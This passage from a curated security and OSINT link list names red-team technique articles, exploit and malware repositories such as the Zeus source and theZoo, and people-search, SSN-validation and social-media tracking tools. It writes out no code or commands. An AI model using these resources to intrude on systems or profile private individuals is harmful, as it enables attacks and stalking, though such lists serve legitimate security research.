Domains](https://medium.com/@vysec.private/validated-cloudfront-ssl-domains-27895822cea3) * [Vshadow: Abusing the Volume Shadow Service for Evasion, Persistence, and Active Directory Database Extraction](https://bohops.com/2018/02/10/vshadow-abusing-the-volume-shadow-service-for-evasion-persistence-and-active-directory-database-extraction/) * [WMI Persistence with Cobalt Strike](https://blog.inspired-sec.com/archive/2017/01/20/WMI-Persistence.html) * [WSH Injection: A Case Study](https://posts.specterops.io/wsh-injection-a-case-study-fd35f79d29dd) * [Weaponizing Data Science for Social Engineering: Automated E2E Spear Phishing on Twitter](https://www.blackhat.com/docs/us-16/materials/us-16-Seymour-Tully-Weaponizing-Data-Science-For-Social-Engineering-Automated-E2E-Spear-Phishing-On-Twitter.pdf) * [Week of Evading Microsoft ATA](http://www.labofapenetrationtester.com/2017/08/week-of-evading-microsoft-ata-day1.html) * [Windows Access Tokens and Alternate Credentials](https://blog.cobaltstrike.com/2015/12/16/windows-access-tokens-and-alternate-credentials/) * [Windows Defender Attack Surface Reduction Rules Bypass](https://oddvar.moe/2018/03/15/windows-defender-attack-surface-reduction-rules-bypass/) * [Windows Oneliners to Download Remote Payload and Execute Arbitrary Code](https://arno0x0x.wordpress.com/2017/11/20/windows-oneliners-to-download-remote-payload-and-execute-arbitrary-code/) * [Windows Privilege Escalation checklist](https://github.com/netbiosX/Checklists/blob/master/Windows-Privilege-Escalation.md) * [android-security-awesome](https://github.com/ashishb/android-security-awesome) * [harmj0y Presentations and Blogs - Windows and Active Directory Exploitation](https://www.harmj0y.net/blog/) * [mavinject.exe Functionality Deconstructed](https://posts.specterops.io/mavinject-exe-functionality-deconstructed-c29ab2cf5c0e) * [sg1: swiss army knife for data encryption, exfiltration & covert communication](https://securityonline.info/sg1-swiss-army-knife/) #### Clearnet Exploit Databases * [0day.today](https://0day.today/) * [Awesome CVE PoC](https://github.com/qazbnm456/awesome-cve-poc) * [Contagio](http://contagiodump.blogspot.com/) * [Exploit-DB](https://www.exploit-db.com/) * [InfoSec - CERT-PA](https://infosec.cert-pa.it/analyze/submission.html) * [MalShare](https://malshare.com/) * [Packet Storm Security](https://packetstormsecurity.com/) * [Tracker h3x](http://tracker.h3x.eu/) * [VX Vault](http://vxvault.net/ViriList.php) * [VirusBay](https://beta.virusbay.io/) * [VirusShare](https://virusshare.com/) * [VirusSign](http://www.virussign.com/) * [Zeus Trojan source code](https://github.com/Visgean/Zeus) * [theZoo](https://github.com/ytisf/theZoo) #### Awesome Master Lists * [Also Hacking](https://github.com/carpedm20/awesome-hacking) * [Android Security Analysis](https://github.com/ashishb/android-security-awesome) * [Application Security](https://github.com/paragonie/awesome-appsec) * [Bug Bounty](https://github.com/djadmin/awesome-bug-bounty) * [CVE Proof of Concepts](https://github.com/qazbnm456/awesome-cve-poc) * [Capture The Flag](https://github.com/apsdehal/awesome-ctf) * [Exploit Development](https://github.com/FabioBaroni/awesome-exploit-development) * [Forensics](https://github.com/Cugu/awesome-forensics) * [Hacking Lists](https://github.com/udpsec/awesome-hacking-lists) * [Hacking Resources](https://github.com/vitalysim/Awesome-Hacking-Resources) * [Hacking](https://github.com/jekil/awesome-hacking) * [Honeypot](https://github.com/paralax/awesome-honeypots) * [Incident Response](https://github.com/meirwah/awesome-incident-response) * [Industrial Control System Security](https://github.com/hslatman/awesome-industrial-control-system-security) * [Lockpicking](https://github.com/fabacab/awesome-lockpicking) * [Malware Analysis](https://github.com/rshipp/awesome-malware-analysis) * [OSINT](https://github.com/jivoi/awesome-osint) * [Packet Capture Tools](https://github.com/caesar0301/awesome-pcaptools) * [PenTesting](https://github.com/x0x8x/awesome-pentester) * [Penetration Testing](https://github.com/enaqx/awesome-pentest/) - Supported by Netsparker * [Red Teaming](https://github.com/yeyintminthuhtut/Awesome-Red-Teaming) * [SecLists](https://github.com/danielmiessler/SecLists) - Useful security related lists to reference/work off of in a pentest * [Security Talks](https://github.com/PaulSec/awesome-sec-talks) * [Security](https://github.com/sbilly/awesome-security) * [Starting Up Security](https://scrty.io/) - A collection of information security essays and links to help growing teams manage risks. * [Threat Intelligence](https://github.com/hslatman/awesome-threat-intelligence) * [Web Security](https://github.com/qazbnm456/awesome-web-security) * [YARA](https://github.com/InQuest/awesome-yara) #### Knowledge Bases * [0day](http://0day.today/) * [Alienvault Open Threat Exchange (OTX)](https://otx.alienvault.com/) - Live threat feed. * [Cvedetails](https://www.cvedetails.com/) * [CyBOK](https://www.cybok.org/knowledgebase/) * [Exploit-db](https://www.exploit-db.com/) * [Jetlib](https://sec.jetlib.com/) * [MITRE ATT&CK](https://attack.mitre.org/tactics/enterprise/) * [Mitre](http://cve.mitre.org/) * [Nvd.nist.gov](https://nvd.nist.gov/download/nvd-rss-analyzed.xml) * [OSINT Intel Techniques](https://inteltechniques.com/) * [Openwall](https://www.openwall.com/lists/oss-security/) * [Packetstormsecurity](https://packetstormsecurity.com/) * [Rapid7](https://www.rapid7.com/db/) * [Securityfocus](https://www.securityfocus.com/bid) * [Seebug](https://www.seebug.org/) * [Talos Intelligence](https://talosintelligence.com/) - Live threat feed. * [Top 100 Cyber Security Blogs and Websites](https://blog.feedspot.com/cyber_security_blogs/) * [Vulnerability-lab](https://www.vulnerability-lab.com) * [Wpvulndb](https://wpscan.com/api) * [Zerodayinitiative](https://www.zerodayinitiative.com/advisories/published/) ### OSINT Tools Used #### General OSINT Tools * [AbuseIPDB](https://www.abuseipdb.com/) - Search engine for blacklisted IPs or domains. * [AutoShun](https://riskanalytics.com/community/) - Public repository of malicious IPs and other resources. * [BadIPs](https://www.badips.com/) - Online blacklist lookup. * [Barcode Reader](https://online-barcode-reader.inliteresearch.com/) - Decode barcodes in C#, VB, Java, C\C++, Delphi, PHP and other languages. * [Belati](https://github.com/aancw/Belati) - The Traditional Swiss Army Knife For OSINT. Belati is tool for Collecting Public Data & Public Document from Website and other service for OSINT purpose. * [Binary Defense IP Ban List](https://www.binarydefense.com/banlist.txt) - Public IP blacklist. * [Blocklist Ipsets](https://github.com/firehol/blocklist-ipsets) - Public IP blacklist. * [Censys](https://censys.io/) - Collects data on hosts and websites through daily ZMap and ZGrab scans. * [CloudFrunt](https://github.com/MindPointGroup/cloudfrunt) - Tool for identifying misconfigured CloudFront domains. * [Combine](https://github.com/mlsecproject/combine) - Open source threat intelligence feed gathering tool. * [Creepy](https://github.com/ilektrojohn/creepy) - Geolocation OSINT tool. * [Datasploit](https://github.com/DataSploit/datasploit) - Tool to perform various OSINT techniques on usernames, emails addresses, and domains. * [Dnsenum](https://github.com/fwaeytens/dnsenum/) - Perl script that enumerates DNS information from a domain, attempts zone transfers, performs a brute force dictionary style attack, and then performs reverse look-ups on the results. * [Dnsmap](https://github.com/makefu/dnsmap/) - Passive DNS network mapper. * [Dnsrecon](https://github.com/darkoperator/dnsrecon/) - DNS enumeration script. * [Dnstracer](http://www.mavetju.org/unix/dnstracer.php) - Determines where a given DNS server gets its information from, and follows the chain of DNS servers. * [Dork-cli](https://github.com/jgor/dork-cli) - Command line Google dork tool. * [emagnet](https://github.com/wuseman/EMAGNET) - Automated hacking tool that will find leaked databases. * [FindFrontableDomains](https://github.com/rvrsh3ll/FindFrontableDomains) - Multithreaded tool for finding frontable domains. * [GOSINT](https://github.com/Nhoya/gOSINT) - OSINT tool with multiple modules and a telegram scraper. * [Github-dorks](https://github.com/techgaun/github-dorks) - CLI tool to scan github repos/organizations for potential sensitive information leak. * [GooDork](https://github.com/k3170makan/GooDork) - Command line Google dorking tool. * [Google Hacking Database](https://www.exploit-db.com/google-hacking-database) - Database of Google dorks; can be used for recon. * [Greynoise](https://greynoise.io/) - "Anti-Threat Intelligence" Greynoise characterizes the background noise of the internet, so the user can focus on what is actually important. * [InfoByIp](https://www.infobyip.com/ipbulklookup.php) - Domain and IP bulk lookup tool. * [Intrigue Core](https://github.com/intrigueio/intrigue-core) - Framework for attack surface discovery. * [Machinae](https://github.com/hurricanelabs/machinae) - Multipurpose OSINT tool using threat intelligence feeds. * [Maltego](https://www.maltego.com/) - Proprietary software for open source intelligence and forensics, from Paterva. * [Malware Domain List](http://www.malwaredomainlist.com/) - Search and share malicious URLs. * [NetBootcamp OSINT Tools](https://netbootcamp.org/osinttools/) * [OSINT Framework](https://osintframework.com/) * [OpenRefine](https://github.com/OpenRefine) - Free & open source power tool for working with messy data and improving it. * [Orbit](https://github.com/s0md3v/Orbit) - Draws relationships between crypto wallets with recursive crawling of transaction history. * [OsintStalker](https://github.com/milo2012/osintstalker) - Python script for Facebook and geolocation OSINT. * [Outwit](http://www.outwit.com) - Find, grab and organize all kinds of data and media from online sources. * [PaGoDo](https://github.com/opsdisk/pagodo) - Passive, automated Google dorking tool. * [Passivedns-client](https://github.com/chrislee35/passivedns-client) - Library and query tool for querying several passive DNS providers. * [Passivedns](https://github.com/gamelinux/passivedns) - Network sniffer that logs all DNS server replies for use in a passive DNS setup. * [Photon](https://github.com/s0md3v/Photon) - Crawler designed for OSINT. * [Pown Recon](https://github.com/pownjs/recon) - Target reconnaissance framework powered by graph theory. * [QuickCode](https://quickcode.io/) - Python and R data analysis environment. * [Raven](https://github.com/0x09AL/raven) - LinkedIn information gathering tool. * [Recon-ng](https://github.com/lanmaster53/recon-ng) - Full-featured Web Reconnaissance framework written in Python. * [SecApps Recon](https://secapps.com/tools/recon/) - Information gathering and target reconnaissance tool and UI. * [Spamcop](https://www.spamcop.net/bl.shtml) - IP based blacklist. * [Spamhaus](https://www.spamhaus.org/lookup/) - Online blacklist lookup. * [Spiderfoot](https://www.spiderfoot.net/) - Open source OSINT automation tool with a Web UI and report visualizations * [ThreatCrowd](https://www.threatcrowd.org/) - Threat search engine. * [ThreatTracker](https://github.com/michael-yip/ThreatTracker) - Python based IOC tracker. * [Vcsmap](https://github.com/melvinsh/vcsmap) - Plugin-based tool to scan public version control systems for sensitive information. * [XRay](https://github.com/evilsocket/xray) - XRay is a tool for recon, mapping and OSINT gathering from public networks. * [Zen](https://github.com/s0md3v/Zen) - Find email addresses of Github users. * [malc0de DNSSinkhole](http://malc0de.com/bl/) - List of domains that have been identified as distributing malware during the past 30 days. * [malc0de Database](http://malc0de.com/database/) - Searchable incident database. * [pygreynoise](https://github.com/GreyNoise-Intelligence/pygreynoise) - Greynoise Python Library * [sn0int](https://github.com/kpcyrd/sn0int) - Semi-automatic OSINT framework and package manager. * [theHarvester](https://github.com/laramies/theHarvester) - E-mail, subdomain and people names harvester. #### Crypto OSINT Search * [Bitcoin Abuse](https://www.bitcoinabuse.com/) - Database of wallets associated with ransomware, blackmailers and fraud. * [Bitcoin Who's Who](https://bitcoinwhoswho.com/) - Database of known ID information from bitcoin addresses. * [Blockchair](https://blockchair.com/) - Multiple blockchain explorer. * [Wallet Explorer](https://www.walletexplorer.com/) - Finds all known associated bitcoin addresses from a single known address. #### Government Record Search * [Blackbook](https://www.blackbookonline.info/index.html) - Public Records Starting Point. * [FOIA Search](https://www.foia.gov/search.html) - Government information request portal. * [PACER](https://pacer.uscourts.gov/) - Public Access to Federal Court Records. * [RECAP](https://www.courtlistener.com/recap/) - Free version of PACER. Includes browser extensions for Chrome & Firefox. * [SSN Validator](https://www.ssnvalidator.com/index.aspx) - Confirms valid Social Security Numbers. #### National Search Engines *Localized search engines by country.* * [Alleba (Philippines)](https://www.alleba.com/) * [Baidu (China)](https://www.baidu.com/) * [Eniro (Sweden)](https://www.eniro.se/) * [Goo (Japan)](https://www.goo.ne.jp/) * [Najdsi (Slovenia)](http://www.najdi.si) * [Naver (South Korea)](https://www.naver.com/) * [Onet.pl (Poland)](https://www.onet.pl/) * [Orange (France)](https://www.orange.fr/portail) * [Parseek (Iran)](https://www.parseek.com/) * [SAPO (Portugal)](https://www.sapo.pt/) * [Search.ch (Switzerland)](https://www.search.ch/) * [Walla (Israel)](https://www.walla.co.il/) * [Yandex (Russia)](https://yandex.com/) #### Meta Search *Lesser known and used search engines.* * [All-in-One](https://all-io.net/) * [AllTheInternet](https://www.alltheinternet.com/) * [Etools](https://www.etools.ch/) * [FaganFinder](https://www.faganfinder.com/) * [Goofram](http://www.goofram.com) * [Myallsearch](http://www.myallsearch.com) * [Qwant](https://www.qwant.com/) * [Sputtr](http://www.sputtr.com) * [Trovando](http://www.trovando.it) * [WebOasis](https://weboas.is/) * [Zapmeta](https://www.zapmeta.com/) * [iZito](https://www.izito.com/) #### Visual Search and Clustering Search Engines *Search engines that scrape multiple sites (Google, Yahoo, Bing, Goo, etc) at the same time and return results.* * [Carrot2](https://search.carrot2.org/#/search/web) * Organizes your search results into topics. * [Yippy](https://www.yippy.com/) * Search using multiple sources at once #### Document and Slides Search *Search for data located on PDFs, Word documents, presentation slides, and more.* * [Authorstream](http://www.authorstream.com) * [Find-pdf-doc](http://www.findpdfdoc.com) * [Free Full PDF](http://www.freefullpdf.com) * [Offshore Leak Database](https://offshoreleaks.icij.org) * [PDF Search Engine](http://www.pdfsearchengine.info) * [RECAP](https://www.courtlistener.com/recap/) * [Scribd](https://www.scribd.com/) * [SlideShare](https://www.slideshare.net/) * [Slideworld](http://www.slideworld.com) * [soPDF.com](http://www.sopdf.com) #### Pastebin Search * [Pastebin](https://pastebin.com/) - Pastebin is a website where you can store any text online for easy sharing. #### Code Search *Search by website source code* * [NerdyData](https://www.nerdydata.com/) - Search engine for source code. * [SearchCode](https://searchcode.com) - Help find real world examples of functions, API's and libraries across 10+ sources. #### Real-Time Search, Social Media Search, and General Social Media Tools * [Audiense](https://audiense.com/) * [Blazent](https://www.blazent.com/) * [Brandwatch](https://www.brandwatch.com) * [Buffer](https://buffer.com) * [Buzz sumo](https://buzzsumo.com/) * [Geocreepy](http://www.geocreepy.com) * [Geofeedia](https://geofeedia.com) * [Hootsuite](https://www.hootsuite.com/) * [Hashtatit](https://www.hashatit.com/) * [Klear](https://klear.com/) * [Kred](https://www.home.kred/) * [SproutSocial](https://sproutsocial.com/) * [Netvibes](https://www.netvibes.com/en) * [OpinionCrawl](http://www.opinioncrawl.com) * [Rival IQ](https://www.rivaliq.com) * [RSS Social Analyzer](https://chrome.google.com/webstore/detail/rss-social-analyzer/ncmajlpbfckecekfamgfkmckbpihjfdn?hl=en) * [SocialBakers](https://www.socialbakers.com/) * [SociaBlade](http://socialblade.com) * [Social DownORNot](http://social.downornot.com) * [Social Searcher](https://www.social-searcher.com/) * [Tagboard](https://tagboard.com) * [Reputation Refinery](https://reputationrefinery.com/) * [UVRX](http://www.uvrx.com/social.html) #### Twitter Search * [Backtweets](http://backtweets.com) * [Fake Follower Check](https://fakers.statuspeople.com) * [First Tweet](https://ctrlq.org/first) * [FirstTweet](https://about.twitter.com/#i_intelligence) * [Foller.me](https://foller.me/) * [FollowCheck](http://followcheck.com) * [Followerwonk](https://followerwonk.com/) * [GeoSocial Footprint](http://geosocialfootprint.com) * [Geochirp](http://www.geochirp.com) * [Gigatweeter](http://gigatweeter.com) * [Ground Signal](https://www.groundsignal.com) * [HappyGrumpy](https://www.happygrumpy.com) * [Harvard TweetMap](http://worldmap.harvard.edu/tweetmap) * [Hashtagify](https://hashtagify.me/) * [Hashtags.org](https://www.hashtags.org/) * [ManageFlitter](https://www.manageflitter.com/) * [Mentionmapp](https://mentionmapp.com/) * [OneMillionTweetMap](https://onemilliontweetmap.com/) * [Rank Speed](https://rankspeed.com/) * [Riffle](https://crowdriff.com/) * [RiteTag](https://ritetag.com) * [Schedule Warble](https://warble.co) * [Sentiment140](http://www.twittersentiment.appspot.com) * [Sleeping Time](http://sleepingtime.org) * [Social Bearing](https://socialbearing.com/) * [TruFan](https://www.trufan.io/) * [Spoonbill](http://spoonbill.io) * [TWUBS Twitter Chat](http://twubs.com/twitter-chats) * [Tagdef](https://tagdef.com/en/) * [Tinfoleak](https://tinfoleak.com) * [Trends24](https://trends24.in/) * [TrendsMap](https://www.trendsmap.com/) * [TwChat](http://twchat.com) * [Twazzup](http://new.twazzup.com/) * [Tweet Tag](https://www.tweet-tag.com/) * [TweetArchivist](http://www.tweetarchivist.com) * [TweetDeck](https://tweetdeck.twitter.com/) * [TweetMap](https://www.omnisci.com/demos/tweetmap) * [TweetMap](http://worldmap.harvard.edu/tweetmap) * [TweetPsych](http://tweetpsych.com) * [TweetStats](http://www.tweetstats.com) * [TweetTunnel](http://tweettunnel.com) * [Tweetreach](https://tweetreach.com/) * [Twellow](https://www.twellow.com/) * [Tweriod](https://www.tweriod.com/) * [Twiangulate](http://www.twiangulate.com/search/) * [Twicsy](https://twicsy.com/) * [Twilert](https://www.twilert.com/) * [Twipho](http://www.twipho.net) * [TwitRSS](https://twitrss.me) * [Twitonomy](http://www.twitonomy.com) * [Twitter Advanced Search](https://twitter.com/search-advanced?lang=en) * [Twitter Audit](https://www.twitteraudit.com) * [Twitter Chat Schedule](https://www.tweetreports.com/twitter-chat-schedule/) * [Twitter Search](https://twitter.com/explore) * [Twitterfall](https://twitterfall.com/) * [burrrd.](https://burrrd.com) * [doesfollow](https://doesfollow.com) #### Facebook Search * [Agora Pulse](https://barometer.agorapulse.com/home) * [Commun.it](https://commun.it/) * [ExtractFace](https://le-tools.com/) * [Fanpage Karma](https://www.fanpagekarma.com/) * [Facebook Search](https://www.facebook.com/help/821153694683665/) * [Facebook Search Tool](https://netbootcamp.org/facebook.html) * [FaceLIVE](https://www.facelive.org) * [Fb-sleep-stats](https://github.com/sqren/fb-sleep-stats) * [Find my Facebook ID](https://findmyfbid.in) * [Lookup-ID.com](https://lookup-id.com) * [SearchIsBack](https://searchisback.com) * [Wallfux](https://clearinghouse.wallflux.com/) * [Wolfram Alpha Facebook Report](https://www.wolframalpha.com/input/?i=facebook+report) * [Zesty Facebook Search](http://zesty.ca/facebook/) #### Instagram Search * [Hashtagify](https://hashtagify.me/hashtag/wandavision) * [Iconosquare](https://pro.iconosquare.com/) * [Picodash](https://www.picodash.com) * [SnapMap](https://snapmap.knightlab.com/) * [Social Rank](https://socialrank.com/) * [Worldcam](http://worldc.am) #### Pinterest Search * [Pingroupie](https://pingroupie.com/) #### Reddit Search *Tools to help discover more about a reddit user or subreddit.* * [Imgur](https://imgur.com/search) - The most popular image hosting website used by redditors. * [Mostly Harmless](http://kerrick.github.io/Mostly-Harmless/#features) - Mostly Harmless looks up the page you are currently viewing to see if it has been submitted to reddit. * [Reddit Archive](https://www.redditinvestigator.com/) - Historical archives of reddit posts. * [Reddit Comment Search](https://redditcommentsearch.com/) - Analyze a reddit users by comment history. * [Reddit Investigator](http://www.redditinvestigator.com) - Investigate a reddit users history. * [Reddit Suite](https://chrome.google.com/webstore/detail/reddit-enhancement-suite/kbmfpngjjgdllneeigpgjifpgocmfgmb) - Enhances your reddit experience. * [Reddit User Analyser](https://atomiks.github.io/reddit-user-analyser/) - reddit user account analyzer. * [Subreddits](http://subreddits.org) - Discover new subreddits. #### VKontakte Search *Perform various OSINT on Russian social media site VKontakte.* * [Barkov.net](https://vk.barkov.net/) * [Report Tree](http://dcpu.ru/vk_repost_tree.php) * [Snradar](http://snradar.azurewebsites.net) - Search pictures by time and location they were taken * [Social Stats](http://socialstats.ru) * [Target Hunter](https://targethunter.ru/) * [Target Log](https://targetolog.com/) * [VK Community Search](https://vk.com/communities) * [VK Parser](http://vkparser.ru) - A tool to search for a target audience and potential customers. * [VK People Search](https://vk.com/people) * [VK to RSS Appspot](http://vk-to-rss.appspot.com/) * [VK5](http://vk5.city4me.com) * [Дезертир](https://vk.com/app3046467) #### Blog Search * [BlogSearchEngine](http://www.blogsearchengine.org) * [Notey](https://www.notey.com/) - Blog post search engine. * [Outbrain](https://www.outbrain.com/publishers/) * [Twingly](https://www.twingly.com/) #### Username Check * [Check User Names](https://checkusernames.com/) * [Knowem](https://knowem.com/) - Search for a username on over 500 popular social networks. * [Linkedin2Username](https://gitlab.com/initstring/linkedin2username) - Web scraper that uses valid LinkedIn credentials to put together a list of employees for a specified company. * [Name Checkr](https://www.namecheckr.com/) * [Name Checkup](https://namecheckup.com) * [Name Chk](https://www.namechk.com/) * [User Search](https://usersearch.org/index.php) #### Personal Investigations * [192 (UK)](https://www.192.com/) * [411 (US)](https://www.411.com/) * [Alumni.net](https://www.alumni.net/) * [Ancestry](https://www.ancestry.com/) * [Been Verified](https://www.beenverified.com/) - Good accuracy, paid person search. * [CVGadget](https://www.cvgadget.com/) * [Canada411](https://www.canada411.ca/) * [Cedar](https://cedar.buffalo.edu/AdServ/person-search.html) * [Charlie App](https://www.detective.io/) * [Classmates](https://www.classmates.com/) * [CrunchBase](https://www.crunchbase.com/) * [Data 24-7](https://www.data247.com/) * [Family Search](https://www.familysearch.org/en/) * [Family Tree Now](https://www.familytreenow.com/) * [Federal Bureau of Prisons Inmate Locator (US)](https://www.bop.gov/inmateloc/) - Find an inmate that is in the Federal Bureau of Prisons system. * [Fold3 (US Military Records)](https://www.fold3.com/) - Browse records of US Military members. * [Genealogy Bank](https://www.genealogybank.com/) * [Genealogy Links](https://www.genealogylinks.net/) * [Go Find Who](https://gofindwho.com/) - Multiple handy search tools. * [Homemetry](https://homemetry.com) * [Infobel](https://www.infobel.com/) * [Infospace White Pages](https://infospace.com/home/white-pages) * [Interment](http://www.interment.net/data/search.htm) * [International White and Yellow Pages](http://www.wayp.com) * [Itools](http://itools.com/search/people-search) * [Kompass](https://us.kompass.com/) * [Locate Family](https://www.locatefamily.com/) - Basicly a worldwide phonebook that can be manually searched. This site shows up as results on google.com so searches based on name, address, or phone number. * [LookUpUK](http://www.lookupuk.com/main.html) * [Lullar](https://com.lullar.com/) * [MelissaDATA](https://www.melissa.com/v2/lookups/) * [My Life People Search](https://www.mylife.com/reverse-people-search) * [My Life](https://www.mylife.com/) - Paid people search with lots of results. * [PeekYou](https://www.peekyou.com/) * [People Search (Australia)](https://www.peoplesearch.com.au/) * [PeopleSearch.net](http://www.peoplesearch.net) * [Pipl](https://pipl.com) * [Rapportive](https://business.linkedin.com/sales-solutions) * [RecordsPedia](http://recordspedia.com) * [Recruitem](http://recruitin.net) * [Reunion](https://www.reunion.com/) * [Rootsweb](https://home.rootsweb.com/) * [SearchBug](https://www.searchbug.com/) * [Skip Ease](https://www.skipease.com/) * [SnoopStation](https://snoopstation.com/) * [Sowdust Facebook Search](https://sowdust.github.io/fb-search/) - Facebook search tool. * [Spokeo](https://www.spokeo.com/) * [That's Them](https://thatsthem.com/) - Good accuracy, paid person search. * [The National Archives (UK)](https://www.nationalarchives.gov.uk/) * [USSearch](https://www.ussearch.com/) * [WebMiii](https://webmii.com/) * [White Pages (US)](https://www.whitepages.com/) * [Wink](http://itools.com/tool/wink-people-search) * [Yasni](http://www.yasni.com) * [Zabasearch](https://www.zabasearch.com/) * [Zoominfo](https://www.zoominfo.com/) * [facesearch](http://facesaerch.com) - Search for images of a person by name. * [snitch.name](http://www.snitch.name) #### E-mail Search / E-mail Check * [BriteVerify Email Verification](https://www.validity.com/products/briteverify/email-list-verification/) * [Email Address Validator](https://www.email-validator.net/) * [Email Format](https://www.email-format.com/) * [Email Permutator+](http://metricsparrow.com/toolkit/email-permutator) * [EmailHippo](https://tools.verifyemailaddress.io) * [EmailSearch.net](http://www.email-search.org/search-emails/) * [Have I Been Pwned](https://haveibeenpwned.com) - Search across multiple data breaches to see if your email address has been compromised. * [Hunter](https://hunter.io) - Hunter lets you find email addresses in seconds and connect with the people that matter for your business. * [MailTester](https://mailtester.com/en/single-email-verification) * [MyCleanList](https://www.mycleanlist.com/) * [Peepmail](http://www.samy.pl/peepmail) * [Pipl](https://pipl.com) * [ReversePhoneCheck](https://www.reversephonecheck.com/) * [ThatsThem](https://thatsthem.com/reverse-email-lookup) * [FindEmails.com](https://www.findemails.com/) * [Verify Email](https://verify-email.org/) * [VoilaNorbert](https://www.voilanorbert.com) - Find anyone's contact information for lead research or talent acquisition. * [h8mail](https://github.com/khast3x/h8mail) - Password Breach Hunting and Email OSINT, locally or using premium services. Supports chasing down related email #### Phone Number Research * [National Cellular Directory](https://www.nationalcellulardirectory.com/) - was created to help people research and reconnect with one another by performing cell phone lookups. The lookup products includes have billions of records that can be accessed at any time, as well as free searches one hour a day, every day. * [Reverse Phone Lookup](https://www.reversephonelookup.com/) - Detailed information about phone carrier, region, service provider, and switch information. * [Spy Dialer](https://spydialer.com/default.aspx) - Get the voicemail of a cell phone & owner name lookup. * [Twilio](https://www.twilio.com/lookup) - Look up a phone numbers carrier type, location, etc. * [Phone Validator](https://www.phonevalidator.com/index.aspx) - Pretty accurate phone lookup service, particularly good against Google Voice numbers. #### Company Research * [AllStocksLinks](http://www.allstocks.com/links) * [Battle of the Internet Giants](https://influencermarketinghub.com/battle-of-internet-giants) * [Better Business Bureau](https://www.bbb.org/) * [Bizeurope](http://www.bizeurope.com) * [Bloomberg](https://www.bloomberg.com/markets/stocks) * [Business Source](https://www.ebsco.com/products/research-databases/business-source-complete) * [Bureau Van Dijk](https://www.bvdinfo.com/en-gb/) * [Canadian Business Research](https://www.canada.ca/en/services/business/research.html) * [Canadian Business Resource](http://www.cbr.ca) * [Central and Eastern European Business Directory](https://globaledge.msu.edu/global-resources/resource/1274) * [Company Registration Round the World](https://www.sg.ch/recht/handelsregister-notariate.html) * [Company Research Resources by Country Comparably](https://www.comparably.com) * [CompeteShark](https://competeshark.com/) * [Corporate Information](https://www.corporateinformation.com/) * [CrunchBase](https://www.crunchbase.com) * [EDGAR Online](https://www.dfinsolutions.com/products/edgar-online) * [Europages](https://www.europages.co.uk/) * [European Business Register](https://ebra.be/) * [Ezilon](http://www.ezilon.com) * [Factiva](https://global.factiva.com) * [Glassdoor](https://www.glassdoor.com/index.htm) * [globalEdge](https://globaledge.msu.edu/) * [GuideStar](https://www.guidestar.org/) * [Hoovers](https://www.dnb.com/products/marketing-sales/dnb-hoovers.html) * [Inc. 5000](https://www.inc.com/inc5000) * [InstantLogoSearch](http://instantlogosearch.com) * [iSpionage](https://www.ispionage.com/) * [Knowledge guide to international company registration](https://www.icaew.com/library/subject-gateways/business-management/knowledge-guide-international-company-registration) * [Linkedin](https://www.linkedin.com) * [National Company Registers](https://en.wikipedia.org/wiki/List_of_official_business_registers) * [Mergent Intellect](https://www.mergentintellect.com/) * [Mergent Online](https://www.mergentonline.com/login.php) * [Morningstar Research](http://library.morningstar.com) * [Notablist](https://www.notablist.com) * [Orbis directory](https://orbisdirectory.bvdinfo.com/version-20181213/OrbisDirectory/Companies/Login) * [opencorporates](https://opencorporates.com) * [Owler](https://corp.owler.com/) * [Overseas Company Registers](https://www.gov.uk/government/publications/overseas-registries/overseas-registries) * [Plunkett Research](http://www.plunkettresearchonline.com/Login.aspx) * [Scoot](https://www.scoot.co.uk/) * [SEMrush](https://www.semrush.com) * [Serpstat](https://serpstat.com) * [SpyFu](https://www.spyfu.com/) * [Forbes Global 2000](https://www.forbes.com/global2000/) * [Vault](https://www.vault.com/) * [Xing](https://www.xing.com/) #### Domain and IP Research * [Accuranker](https://www.accuranker.com) * [ahrefs](https://ahrefs.com) - A tool for backlink research, organic traffic research, keyword research, content marketing & more. * [Alexa](http://www.alexa.com) * [Bing Webmaster Tools](https://www.bing.com/webmasters/about) * [BuiltWith](https://builtwith.com/) * [Central Ops](https://centralops.net/co/) * [Dedicated or Not](http://dedicatedornot.com) * [DNSDumpster](https://dnsdumpster.com) * [DNS History](http://dnshistory.org) * [DNSStuff](https://www.dnsstuff.com/) * [DNSViz](https://dnsviz.net/) * [Domain Big Data](https://domainbigdata.com/) * [Domain Crawler](https://domaincrawler.com/) * [Domain Dossier](https://centralops.net/co/DomainDossier.aspx) * [Domain Tools](https://whois.domaintools.com/) - Whois lookup and domain/ip historical data. * [Easy whois](https://www.easywhois.com) * [Exonera Tor](https://metrics.torproject.org/exonerator.html) - A database of IP addresses that have been part of the Tor network. It answers the question whether there was a Tor relay running on a given IP address on a given date. * [Follow.net](https://follow.net/) * [GraphyStories](https://app.graphystories.com/) * [HypeStat](https://hypestat.com/) * [Infosniper](https://www.infosniper.net/) * [intoDNS](https://intodns.com/) * [IP Checking](http://www.ipchecking.com) * [IP Location](https://www.iplocation.net/) * [IP 2 Geolocation](http://ip2geolocation.com) * [IP 2 Location](http://www.ip2location.com/demo.aspx) * [IPFingerprints](https://www.ipfingerprints.com/) * [IPVoid](https://www.ipvoid.com/) - IP address toolset. * [IntelliTamper](https://www.softpedia.com/get/Internet/Other-Internet-Related/IntelliTamper.shtml) * [Kloth](http://www.kloth.net/services/) * [NetworkTools](https://network-tools.com/) * [Majestic](https://majestic.com) * [MaxMind](https://www.maxmind.com/en/home) * [MXToolbox](https://mxtoolbox.com/) - MX record lookup tool. * [Netcraft Site Report](https://sitereport.netcraft.com/) * [OpenLinkProfiler](https://www.openlinkprofiler.org/) * [Link Explorer](https://moz.com/link-explorer) * [PageGlimpse](http://www.pageglimpse.com) * [Pentest-Tools.com](https://pentest-tools.com/information-gathering/google-hacking) * [PhishStats](https://phishstats.info/) * [Pulsedive](https://pulsedive.com) * [Quantcast](https://www.quantcast.com) * [Quick Sprout](https://www.quicksprout.com) * [RedirectDetective](https://redirectdetective.com/) * [Remote DNS Lookup](https://remote.12dt.com) * [Robtex](https://www.robtex.com) * [SecurityTrails](https://securitytrails.com/dns-trails) - API to search current and historical DNS records, current and historical WHOIS, technologies used by sites and whois search for phone, email, address, IPs etc. * [SEMrush](https://www.semrush.com) * [SEOTools for Excel](https://seotoolsforexcel.com/) * [Similar Web](https://www.similarweb.com) - Compare any website traffic statistics & analytics. * [SmallSEOTools](https://smallseotools.com/) * [StatsCrop](https://www.statscrop.com/) * [Squatm3gator](https://github.com/david3107/squatm3gator) - Enumerate available domains generated modifying the original domain name through different cybersquatting techniques * [URLVoid](https://www.urlvoid.com/) - Analyzes a website through multiple blacklist engines and online reputation tools to facilitate the detection of fraudulent and malicious websites. * 